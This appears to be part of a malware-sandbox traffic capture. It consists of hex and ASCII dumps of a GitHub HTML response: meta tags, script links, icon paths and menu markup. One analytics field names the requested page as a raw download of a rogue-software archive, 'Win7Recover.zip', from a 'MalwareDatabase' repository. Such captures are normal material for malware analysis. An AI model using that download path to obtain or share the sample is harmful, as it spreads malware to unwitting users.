6f 2d 74 72 61 6e 73 69 65 6e 74 3d 22 74 72 75 65
                                                                                                                                                    Data Ascii: ame="visitor-payload" content="eyJyZWZlcnJlciI6bnVsbCwicmVxdWVzdF9pZCI6IkQyQTY6MTEwQkY6MkExNUJDRjoyQjA5NTJGOjYzMzU5NkFGIiwidmlzaXRvcl9pZCI6IjU0ODM4MTEwMzY4NTY2ODYyNTUiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIiOiJpYWQifQ==" data-turbo-transient="true
                                                                                                                                                    2022-09-29 12:59:27 UTC38178INData Raw: 74 68 22 3e 0a 20 20 20 20 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 69 74 48 75 62 20 69 73 20 77 68 65 72 65 20 70 65 6f 70 6c 65 20 62 75 69 6c 64 20 73 6f 66 74 77 61 72 65 2e 20 4d 6f 72 65 20 74 68 61 6e 20 38 33 20 6d 69 6c 6c 69 6f 6e 20 70 65 6f 70 6c 65 20 75 73 65 20 47 69 74 48 75 62 20 74 6f 20 64 69 73 63 6f 76 65 72 2c 20 66 6f 72 6b 2c 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 65 20 74 6f 20 6f 76 65 72 20 32 30 30 20 6d 69 6c 6c 69 6f 6e 20 70 72 6f 6a 65 63 74 73 2e 22 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 65 61 72 63 68 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 70 65 6e 73 65 61 72 63 68 64 65 73 63 72 69 70 74
                                                                                                                                                    Data Ascii: th"> <meta name="description" content="GitHub is where people build software. More than 83 million people use GitHub to discover, fork, and contribute to over 200 million projects."> <link rel="search" type="application/opensearchdescript
                                                                                                                                                    2022-09-29 12:59:27 UTC38179INData Raw: 22 6f 67 3a 69 6d 61 67 65 3a 77 69 64 74 68 22 20 63 6f 6e 74 65 6e 74 3d 22 31 32 30 30 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 3a 68 65 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 36 32 30 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 6d 6f 64 75 6c 65 73 2f 6f 70 65 6e 5f 67 72 61 70 68 2f 67 69 74 68 75 62 2d 6f 63 74 6f 63 61 74 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6d
                                                                                                                                                    Data Ascii: "og:image:width" content="1200"> <meta property="og:image:height" content="620"> <meta property="og:image" content="https://github.githubassets.com/images/modules/open_graph/github-octocat.png"> <meta property="og:image:type" content="im
                                                                                                                                                    2022-09-29 12:59:27 UTC38180INData Raw: 61 62 6c 65 64 2d 66 65 61 74 75 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 43 54 49 4f 4e 53 5f 52 55 4e 5f 4e 41 4d 45 2c 49 4d 41 47 45 5f 4d 45 54 52 49 43 5f 54 52 41 43 4b 49 4e 47 2c 47 45 4f 4a 53 4f 4e 5f 41 5a 55 52 45 5f 4d 41 50 53 2c 53 54 52 49 43 54 5f 44 45 46 45 52 52 45 44 5f 44 49 46 46 5f 4c 49 4e 45 53 5f 43 48 45 43 4b 53 2c 53 54 52 49 43 54 5f 44 45 46 45 52 52 45 44 5f 44 49 46 46 5f 4c 49 4e 45 53 5f 43 48 45 43 4b 53 5f 52 45 50 4f 52 54 49 4e 47 22 3e 0a 0a 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 70 6a 61 78 2d 76 65 72 73 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 65 31 31 35 62 32 35 39 65 66 37 62 35 39 64 36 37 33 38 35 64 62 38 33 35 61 33 65 61 34 36 61 31 65 65 31 34 61 63 38 30 32 66 31 35
                                                                                                                                                    Data Ascii: abled-features" content="ACTIONS_RUN_NAME,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS,STRICT_DEFERRED_DIFF_LINES_CHECKS,STRICT_DEFERRED_DIFF_LINES_CHECKS_REPORTING"> <meta http-equiv="x-pjax-version" content="e115b259ef7b59d67385db835a3ea46a1ee14ac802f15
                                                                                                                                                    2022-09-29 12:59:27 UTC38182INData Raw: 5f 70 72 69 76 61 74 65 2f 62 72 6f 77 73 65 72 2f 65 72 72 6f 72 73 22 3e 0a 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 62 72 6f 77 73 65 72 2d 6f 70 74 69 6d 69 7a 65 6c 79 2d 63 6c 69 65 6e 74 2d 65 72 72 6f 72 73 2d 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 5f 70 72 69 76 61 74 65 2f 62 72 6f 77 73 65 72 2f 6f 70 74 69 6d 69 7a 65 6c 79 5f 63 6c 69 65 6e 74 2f 65 72 72 6f 72 73 22 3e 0a 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 70 69 6e 6e 65 64 2d 6f 63 74 6f 63 61 74 2e 73 76 67 22 20 63 6f 6c 6f 72 3d 22 23 30 30 30 30 30 30 22 3e 0a
                                                                                                                                                    Data Ascii: _private/browser/errors"> <meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors"> <link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000">
                                                                                                                                                    2022-09-29 12:59:27 UTC38183INData Raw: 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 72 65 6d 6f 74 65 2d 66 6f 72 6d 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 64 65 6c 65 67 61 74 65 64 2d 65 76 65 6e 74 73 5f 64 69 73 74 5f 69 6e 64 65 2d 39 34 66 64 36 37 2d 30 61 32 37 35 63 37 30 62 63 64 37 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20
                                                                                                                                                    Data Ascii: defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-0a275c70bcd7.js"></script><script crossorigin="anonymous" defer="defer"
                                                                                                                                                    2022-09-29 12:59:27 UTC38184INData Raw: 2d 2e 30 31 2d 31 2e 34 39 2d 32 2e 30 31 2e 33 37 2d 32 2e 35 33 2d 2e 34 39 2d 32 2e 36 39 2d 2e 39 34 2d 2e 30 39 2d 2e 32 33 2d 2e 34 38 2d 2e 39 34 2d 2e 38 32 2d 31 2e 31 33 2d 2e 32 38 2d 2e 31 35 2d 2e 36 38 2d 2e 35 32 2d 2e 30 31 2d 2e 35 33 2e 36 33 2d 2e 30 31 20 31 2e 30 38 2e 35 38 20 31 2e 32 33 2e 38 32 2e 37 32 20 31 2e 32 31 20 31 2e 38 37 2e 38 37 20 32 2e 33 33 2e 36 36 2e 30 37 2d 2e 35 32 2e 32 38 2d 2e 38 37 2e 35 31 2d 31 2e 30 37 2d 31 2e 37 38 2d 2e 32 2d 33 2e 36 34 2d 2e 38 39 2d 33 2e 36 34 2d 33 2e 39 35 20 30 2d 2e 38 37 2e 33 31 2d 31 2e 35 39 2e 38 32 2d 32 2e 31 35 2d 2e 30 38 2d 2e 32 2d 2e 33 36 2d 31 2e 30 32 2e 30 38 2d 32 2e 31 32 20 30 20 30 20 2e 36 37 2d 2e 32 31 20 32 2e 32 2e 38 32 2e 36 34 2d 2e 31 38 20 31 2e
                                                                                                                                                    Data Ascii: -.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.
                                                                                                                                                    2022-09-29 12:59:27 UTC38186INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 65 78 2d 31 20 66 6c 65 78 2d 6f 72 64 65 72 2d 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 54 6f 67 67 6c 65 20 6e 61 76 69 67 61 74 69 6f 6e 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6a 73 2d 64 65 74 61 69 6c 73 2d 74 61 72 67 65 74 20 42 75 74 74 6f 6e 2d 2d 6c 69 6e 6b 20 42 75 74 74 6f 6e 2d 2d 6d 65 64 69 75 6d 20 42 75 74 74 6f 6e 20 64 2d 6c 67 2d 6e 6f 6e 65 20 63 6f
                                                                                                                                                    Data Ascii: </a> </div> <div class="flex-1 flex-order-2"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none co
                                                                                                                                                    2022-09-29 12:59:27 UTC38187INData Raw: 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 66 6c 65 78 2d 6a 75 73 74 69 66 79 2d 62 65 74 77 65 65 6e 20 6a 73 2d 64 65 74 61 69 6c 73 2d 74 61 72 67 65 74 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 20 20 20 20 20 20 50 72 6f 64 75 63 74 0a 20 20 20 20 20 20 3c 73 76 67 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 63 68 65 76 72 6f 6e 2d 64 6f 77
                                                                                                                                                    Data Ascii: ex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-dow
                                                                                                                                                    2022-09-29 12:59:27 UTC38188INData Raw: 65 6e 6f 64 64 22 20 64 3d 22 4d 31 20 33 61 32 20 32 20 30 20 30 31 32 2d 32 68 36 2e 35 61 32 20 32 20 30 20 30 31 32 20 32 76 36 2e 35 61 32 20 32 20 30 20 30 31 2d 32 20 32 48 37 76 34 2e 30 36 33 43 37 20 31 36 2e 33 35 35 20 37 2e 36 34 34 20 31 37 20 38 2e 34 33 38 20 31 37 48 31 32 2e 35 76 2d 32 2e 35 61 32 20 32 20 30 20 30 31 32 2d 32 48 32 31 61 32 20 32 20 30 20 30 31 32 20 32 56 32 31 61 32 20 32 20 30 20 30 31 2d 32 20 32 68 2d 36 2e 35 61 32 20 32 20 30 20 30 31 2d 32 2d 32 76 2d 32 2e 35 48 38 2e 34 33 37 41 32 2e 39 33 38 20 32 2e 39 33 38 20 30 20 30 31 35 2e 35 20 31 35 2e 35 36 32 56 31 31 2e 35 48 33 61 32 20 32 20 30 20 30 31 2d 32 2d 32 56 33 7a 6d 32 2d 2e 35 61 2e 35 2e 35 20 30 20 30 30 2d 2e 35 2e 35 76 36 2e 35 61 2e 35 2e 35
                                                                                                                                                    Data Ascii: enodd" d="M1 3a2 2 0 012-2h6.5a2 2 0 012 2v6.5a2 2 0 01-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 012-2H21a2 2 0 012 2V21a2 2 0 01-2 2h-6.5a2 2 0 01-2-2v-2.5H8.437A2.938 2.938 0 015.5 15.562V11.5H3a2 2 0 01-2-2V3zm2-.5a.5.5 0 00-.5.5v6.5a.5.5
                                                                                                                                                    2022-09-29 12:59:27 UTC38190INData Raw: 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 2d 2e 38 37 35 2d 31 2e 35 31 35 4c 31 32 2e 38 37 36 2e 36 33 39 7a 6d 2d 31 20 31 2e 32 39 38 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 32 35 20 30 6c 37 2e 36 32 35 20 34 2e 34 30 32 2d 37 2e 37 35 20 34 2e 34 37 34 2d 37 2e 37 35 2d 34 2e 34 37 34 20 37 2e 36 32 35 2d 34 2e 34 30 32 7a 4d 33 2e 35 30 31 20 37 2e 36 34 76 38 2e 38 30 33 63 30 20 2e 30 39 2e 30 34 38 2e 31 37 32 2e 31 32 35 2e 32 31 36 6c 37 2e 36 32 35 20 34 2e 34 30 32 76 2d 38 2e 39 34 37 4c 33 2e 35 30 31 20 37 2e 36 34 7a 6d 39 2e 32 35 20 31 33 2e 34 32 31 6c 37 2e 36 32 35 2d 34 2e 34 30 32 61 2e 32 35 2e 32 35 20 30 20 30 30 2e 31 32 35 2d 2e 32 31 36 56 37 2e 36 33 39 6c 2d 37 2e 37 35 20 34 2e 34 37 34 76 38 2e 39 34 37 7a 22 3e 3c 2f 70
                                                                                                                                                    Data Ascii: 1.75 1.75 0 00-.875-1.515L12.876.639zm-1 1.298a.25.25 0 01.25 0l7.625 4.402-7.75 4.474-7.75-4.474 7.625-4.402zM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947L3.501 7.64zm9.25 13.421l7.625-4.402a.25.25 0 00.125-.216V7.639l-7.75 4.474v8.947z"></p
                                                                                                                                                    2022-09-29 12:59:27 UTC38191INData Raw: 34 4c 31 32 2e 35 34 2e 36 33 37 7a 6d 2d 2e 36 31 37 20 31 2e 34 32 36 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 31 35 34 20 30 6c 38 2e 32 35 20 32 2e 36 37 36 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 31 37 33 2e 32 33 37 56 31 30 63 30 20 35 2e 34 36 31 2d 33 2e 32 38 20 39 2e 34 38 33 2d 38 2e 34 33 20 31 31 2e 34 32 36 61 2e 32 2e 32 20 30 20 30 31 2d 2e 31 34 20 30 43 36 2e 37 38 20 31 39 2e 34 38 33 20 33 2e 35 20 31 35 2e 34 36 20 33 2e 35 20 31 30 56 34 2e 39 37 36 63 30 2d 2e 31 30 38 2e 30 36 39 2d 2e 32 30 33 2e 31 37 33 2d 2e 32 33 37 6c 38 2e 32 35 2d 32 2e 36 37 36 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6f 72 2d 66 67 2d 64 65
                                                                                                                                                    Data Ascii: 4L12.54.637zm-.617 1.426a.25.25 0 01.154 0l8.25 2.676a.25.25 0 01.173.237V10c0 5.461-3.28 9.483-8.43 11.426a.2.2 0 01-.14 0C6.78 19.483 3.5 15.46 3.5 10V4.976c0-.108.069-.203.173-.237l8.25-2.676z"></path></svg> <div> <div class="color-fg-de
                                                                                                                                                    2022-09-29 12:59:27 UTC38192INData Raw: 31 2e 37 35 76 2d 34 7a 6d 31 2e 37 35 2d 2e 32 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2d 2e 32 35 2e 32 35 76 34 63 30 20 2e 31 33 38 2e 31 31 32 2e 32 35 2e 32 35 2e 32 35 68 31 37 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2e 32 35 2d 2e 32 35 76 2d 34 61 2e 32 35 2e 32 35 20 30 20 30 30 2d 2e 32 35 2d 2e 32 35 48 33 2e 32 35 7a 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 30 20 31 37 2e 37 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2e 37 35 2d 2e 37 35 68 36 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 31 30 20 31 2e 35 68 2d 36 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 2e 37 35 2d 2e 37 35 7a 6d 2d 34 20 30 61 2e 37 35 2e 37 35 20 30 20 30 31 2e 37 35 2d 2e 37 35 68 2e 35 61 2e 37 35
                                                                                                                                                    Data Ascii: 1.75v-4zm1.75-.25a.25.25 0 00-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 00.25-.25v-4a.25.25 0 00-.25-.25H3.25z"></path><path fill-rule="evenodd" d="M10 17.75a.75.75 0 01.75-.75h6.5a.75.75 0 010 1.5h-6.5a.75.75 0 01-.75-.75zm-4 0a.75.75 0 01.75-.75h.5a.75
                                                                                                                                                    2022-09-29 12:59:27 UTC38194INData Raw: 2d 31 2e 31 33 32 20 33 2e 33 36 38 20 30 20 2e 33 36 38 2e 30 31 34 2e 37 33 33 2e 30 35 32 20 31 2e 30 38 36 6c 2d 2e 36 33 33 20 31 2e 34 37 38 2d 2e 30 34 33 2e 30 32 32 41 34 2e 37 35 20 34 2e 37 35 20 30 20 30 30 30 20 31 35 2e 32 32 32 76 31 2e 30 32 38 63 30 20 2e 35 32 39 2e 33 31 2e 39 38 37 2e 35 36 34 20 31 2e 32 39 33 2e 32 38 2e 33 33 36 2e 36 33 37 2e 36 35 33 2e 39 36 37 2e 39 31 38 61 31 33 2e 32 36 32 20 31 33 2e 32 36 32 20 30 20 30 30 31 2e 32 39 39 2e 39 31 31 6c 2e 30 32 34 2e 30 31 35 2e 30 30 36 2e 30 30 34 2e 30 34 2e 30 32 35 2e 31 34 34 2e 30 38 37 63 2e 31 32 34 2e 30 37 33 2e 33 30 34 2e 31 37 37 2e 35 33 35 2e 33 2e 34 36 2e 32 34 35 20 31 2e 31 32 32 2e 35 37 20 31 2e 39 34 32 2e 38 39 34 43 37 2e 31 35 35 20 32 31 2e 33 34
                                                                                                                                                    Data Ascii: -1.132 3.368 0 .368.014.733.052 1.086l-.633 1.478-.043.022A4.75 4.75 0 000 15.222v1.028c0 .529.31.987.564 1.293.28.336.637.653.967.918a13.262 13.262 0 001.299.911l.024.015.006.004.04.025.144.087c.124.073.304.177.535.3.46.245 1.122.57 1.942.894C7.155 21.34
                                                                                                                                                    2022-09-29 12:59:27 UTC38195INData Raw: 76 2e 30 33 31 61 37 2e 32 30 33 20 37 2e 32 30 33 20 30 20 30 31 2d 2e 30 39 20 31 2e 30 37 39 63 2d 2e 31 34 33 2e 39 36 37 2d 2e 34 30 36 20 31 2e 37 35 34 2d 2e 38 35 31 20 32 2e 33 30 31 7a 6d 32 2e 35 30 34 2d 32 2e 34 39 37 61 37 2e 31 37 34 20 37 2e 31 37 34 20 30 20 30 31 2d 2e 30 36 33 2d 2e 38 39 34 76 2d 2e 30 32 63 2e 30 30 31 2d 2e 37 37 2e 31 37 2d 31 2e 32 37 2e 34 33 38 2d 31 2e 35 37 38 2e 33 34 31 2d 2e 33 39 20 31 2e 30 34 36 2d 2e 36 39 20 32 2e 35 33 33 2d 2e 35 32 39 20 31 2e 35 30 36 2e 31 36 33 20 32 2e 33 34 37 2e 35 33 37 20 32 2e 38 32 34 20 31 2e 30 32 35 2e 34 36 32 2e 34 37 32 2e 37 30 35 20 31 2e 31 37 39 2e 37 30 35 20 32 2e 33 31 39 20 30 20 31 2e 32 31 2d 2e 31 37 34 20 31 2e 39 32 36 2d 2e 35 35 38 20 32 2e 33 36 31 2d
                                                                                                                                                    Data Ascii: v.031a7.203 7.203 0 01-.09 1.079c-.143.967-.406 1.754-.851 2.301zm2.504-2.497a7.174 7.174 0 01-.063-.894v-.02c.001-.77.17-1.27.438-1.578.341-.39 1.046-.69 2.533-.529 1.506.163 2.347.537 2.824 1.025.462.472.705 1.179.705 2.319 0 1.21-.174 1.926-.558 2.361-
                                                                                                                                                    2022-09-29 12:59:27 UTC38196INData Raw: 2d 32 2e 39 30 38 2d 32 2e 37 7a 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 2e 35 20 34 2e 32 35 63 30 2d 2e 39 36 36 2e 37 38 34 2d 31 2e 37 35 20 31 2e 37 35 2d 31 2e 37 35 68 31 37 2e 35 63 2e 39 36 36 20 30 20 31 2e 37 35 2e 37 38 34 20 31 2e 37 35 20 31 2e 37 35 76 31 32 2e 35 61 31 2e 37 35 20 31 2e 37 35 20 30 20 30 31 2d 31 2e 37 35 20 31 2e 37 35 68 2d 39 2e 36 39 6c 2d 33 2e 35 37 33 20 33 2e 35 37 33 41 31 2e 34 35 37 20 31 2e 34 35 37 20 30 20 30 31 35 20 32 31 2e 30 34 33 56 31 38 2e 35 48 33 2e 32 35 61 31 2e 37 35 20 31 2e 37 35 20 30 20 30 31 2d 31 2e 37 35 2d 31 2e 37 35 56 34 2e 32 35 7a 4d 33 2e 32 35 20 34 61 2e 32 35 2e 32 35 20 30 20 30 30 2d 2e 32 35 2e 32
                                                                                                                                                    Data Ascii: -2.908-2.7z"></path><path fill-rule="evenodd" d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 01-1.75 1.75h-9.69l-3.573 3.573A1.457 1.457 0 015 21.043V18.5H3.25a1.75 1.75 0 01-1.75-1.75V4.25zM3.25 4a.25.25 0 00-.25.2
                                                                                                                                                    2022-09-29 12:59:27 UTC38198INData Raw: 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6f 72 2d 66 67 2d 64 65 66 61 75 6c 74 20 68 34 22 3e 49 73 73 75 65 73 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 50 6c 61 6e 20 61 6e 64 20 74 72 61 63 6b 20 77 6f 72 6b 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 0a 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 64 72 6f 70 64 6f 77 6e 2d 6c 69 6e 6b 20 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 70 79 2d 32 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63
                                                                                                                                                    Data Ascii: <div class="color-fg-default h4">Issues</div> Plan and track work </div> </a></li> <li> <a class="HeaderMenu-dropdown-link lh-condensed d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-c
                                                                                                                                                    2022-09-29 12:59:27 UTC38199INData Raw: 20 30 31 2e 35 33 2e 32 32 6c 32 2e 37 32 20 32 2e 37 32 76 2d 32 2e 31 39 61 2e 37 35 2e 37 35 20 30 20 30 31 2e 37 35 2d 2e 37 35 68 32 61 2e 32 35 2e 32 35 20 30 20 30 30 2e 32 35 2d 2e 32 35 76 2d 39 2e 35 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6f 72 2d 66 67 2d 64 65 66 61 75 6c 74 20 68 34 22 3e 44 69 73 63 75 73 73 69 6f 6e 73 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 43 6f 6c 6c 61 62 6f 72 61 74 65 20 6f 75 74 73 69 64 65 20 6f 66 20 63 6f 64 65 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 0a 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73
                                                                                                                                                    Data Ascii: 01.53.22l2.72 2.72v-2.19a.75.75 0 01.75-.75h2a.25.25 0 00.25-.25v-9.5z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div> </a></li> </ul> <ul clas
                                                                                                                                                    2022-09-29 12:59:27 UTC38200INData Raw: 38 30 30 30 0d 0a 74 75 72 65 73 0a 0a 20 20 20 20 0a 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 64 72 6f 70 64 6f 77 6e 2d 6c 69 6e 6b 20 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 70 79 2d 32 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 50 72
                                                                                                                                                    Data Ascii: 8000tures </a></li> <li> <a class="HeaderMenu-dropdown-link lh-condensed d-block no-underline position-relative py-2 Link--secondary" target="_blank" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Pr
                                                                                                                                                    2022-09-29 12:59:27 UTC38201INData Raw: 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 47 69 74 48 75 62 20 53 6b 69 6c 6c 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 45 6e 64 65 72 6d 61 6e 63 68 2f 4d 61 6c 77 61 72 65 44 61 74 61 62 61 73 65 2f 72 61 77 2f 6d 61 73 74 65 72 2f 72 6f 67 75 65 73 2f 57 69 6e 37 52 65 63 6f 76 65 72 2e 7a 69 70 3b 72 65 66 5f 63 74 61 3a 47 69 74 48 75 62 20 53 6b 69 6c 6c 73 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 6b 69 6c 6c 73 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 22 3e 0a 20 20 20 20 20 20 47 69 74 48 75 62 20 53 6b 69 6c 6c 73 0a 0a 20 20 20 20 3c 73 76 67 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 68 65 69 67 68
                                                                                                                                                    Data Ascii: quot;click to go to GitHub Skills&quot;,&quot;label&quot;:&quot;ref_page:/Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zip;ref_cta:GitHub Skills;&quot;}" href="https://skills.github.com/"> GitHub Skills <svg aria-hidden="true" heigh
